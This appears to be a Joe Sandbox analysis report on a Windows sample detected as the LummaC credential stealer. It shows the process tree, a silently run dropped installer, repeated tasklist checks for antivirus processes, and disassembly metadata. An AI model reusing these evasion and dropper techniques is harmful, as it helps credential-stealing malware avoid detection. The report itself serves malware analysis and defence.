2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 04 81 Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53 Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.TS
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 77 29 Data Ascii: truction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@w)
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 02 00 Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d 40 00 Data Ascii: @~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=@
2025-01-01 15:54:09 UTC	1369	IN	Data Raw: 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 Data Ascii: Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCopy

Target ID:	0
Start time:	10:50:59
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\qnUFsmyxMm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\qnUFsmyxMm.exe"
Imagebase:	0x910000
File size:	2'462'720 bytes
MD5 hash:	A00F1411626BDF8860A00A2EE9F77709
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3872846044.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3979712058.00000000006F2000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3868669756.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3868587610.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3858599222.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:54:14
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
Imagebase:	0x290000
File size:	8'856'972 bytes
MD5 hash:	C89C55FE25372BFBF8B9264A647C144B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 51%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:54:16
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
Imagebase:	0x290000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:54:16
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
Imagebase:	0x290000
File size:	8'856'972 bytes
MD5 hash:	C89C55FE25372BFBF8B9264A647C144B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:54:17
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
Imagebase:	0x620000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:54:44
Start date:	01/01/2025
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	"timeout" 9
Imagebase:	0x7ff790860000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:54:44
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Imagebase:	0x7ff692a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:	0x7ff6c21b0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "wrsa.exe"
Imagebase:	0x7ff6bee80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Imagebase:	0x7ff692a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:	0x7ff6c21b0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:54:53
Start date:	01/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "opssvc.exe"
Imagebase:	0x7ff6bee80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Imagebase:	0x7ff692a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:	0x7ff6c21b0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avastui.exe"
Imagebase:	0x7ff6bee80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Imagebase:	0x7ff692a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:	0x7ff6c21b0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:54:54
Start date:	01/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avgui.exe"
Imagebase:	0x7ff6bee80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Imagebase:	0x7ff692a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:	0x7ff6c21b0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "nswscsvc.exe"
Imagebase:	0x7ff6bee80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Imagebase:	0x7ff692a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Imagebase:	0x7ff6c21b0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:54:55
Start date:	01/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "sophoshealth.exe"
Imagebase:	0x7ff6bee80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:54:59
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe"
Imagebase:	0x400000
File size:	846'404'211 bytes
MD5 hash:	A42E953364198E087438838FD14040E7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	72.3%
Total number of Nodes:	347
Total number of Limit Nodes:	12

Executed Functions

Function 007C6B50 Relevance: 25.3, APIs: 11, Strings: 3, Instructions: 761
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(007D068C,00000000,00000001,007D067C,00000000), ref: 007C6DB8
SysAllocString.OLEAUT32(58984697), ref: 007C6E64
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 007C6EA2
SysAllocString.OLEAUT32(C412C216), ref: 007C6EF6
SysAllocString.OLEAUT32(26E024D0), ref: 007C6FB1
VariantInit.OLEAUT32(1807061D), ref: 007C7020
SysFreeString.OLEAUT32(DA1CD8DB), ref: 007C72E2
SysFreeString.OLEAUT32(?), ref: 007C72EB
SysFreeString.OLEAUT32(00000000), ref: 007C72FC
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007C7338

Strings

)*, xrefs: 007C6DEE
&, xrefs: 007C6C71
56, xrefs: 007C705E

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: )*$56$&
API String ID: 2247799857-3848306231
Opcode ID: 6fcae6a868640faa99ad6464bac92317f1cde9b25914f50047b4339ad2ac79e7
Instruction ID: bb3632e0dbde4e8d2b4a19a03613daa37f194cf2d7f33e2905a3bd121dbd54e2
Opcode Fuzzy Hash: 6fcae6a868640faa99ad6464bac92317f1cde9b25914f50047b4339ad2ac79e7
Instruction Fuzzy Hash: F732E172A083419FD314CF68C881B5BBBE6FFC5714F18892DE5949B281D778D906CB92

Function 007B1BE0 Relevance: 20.5, Strings: 16, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^, xrefs: 007B1EB5
e, xrefs: 007B1EA6
Z, xrefs: 007B1EA1
W, xrefs: 007B2031
], xrefs: 007B1EB0
k, xrefs: 007B21F0
o, xrefs: 007B21EB
T, xrefs: 007B2022
i, xrefs: 007B1E11
\, xrefs: 007B2027
W, xrefs: 007B202C
,, xrefs: 007B215F
g, xrefs: 007B1E9C
l, xrefs: 007B21F5
\, xrefs: 007B1EAB
!@, xrefs: 007B1C13

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$,$T$W$W$Z$\$\$]$^$e$g$i$k$l$o
API String ID: 383220839-1786846473
Opcode ID: f0f6ee7c61d323dddeea4e7baf1a073f3a5893c9185e4157469e69c394c1cd88
Instruction ID: 00e0573c42b5104a2f479f8b65907830bafd58b12eea4adb7fc68fa72387be18
Opcode Fuzzy Hash: f0f6ee7c61d323dddeea4e7baf1a073f3a5893c9185e4157469e69c394c1cd88
Instruction Fuzzy Hash: 9822CE7160D3808FD3249F78C4953AFBBE2AB85310F588A2DE5D687392D67D8846CB53

Function 007C2950 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 007C2999
GetSystemMetrics.USER32 ref: 007C29A9

Strings

$W}, xrefs: 007C2BA6
, xrefs: 007C2A96
V}, xrefs: 007C2B4E
4W}, xrefs: 007C2BBC
V}, xrefs: 007C2B59
,W}, xrefs: 007C2BB1

Memory Dump Source

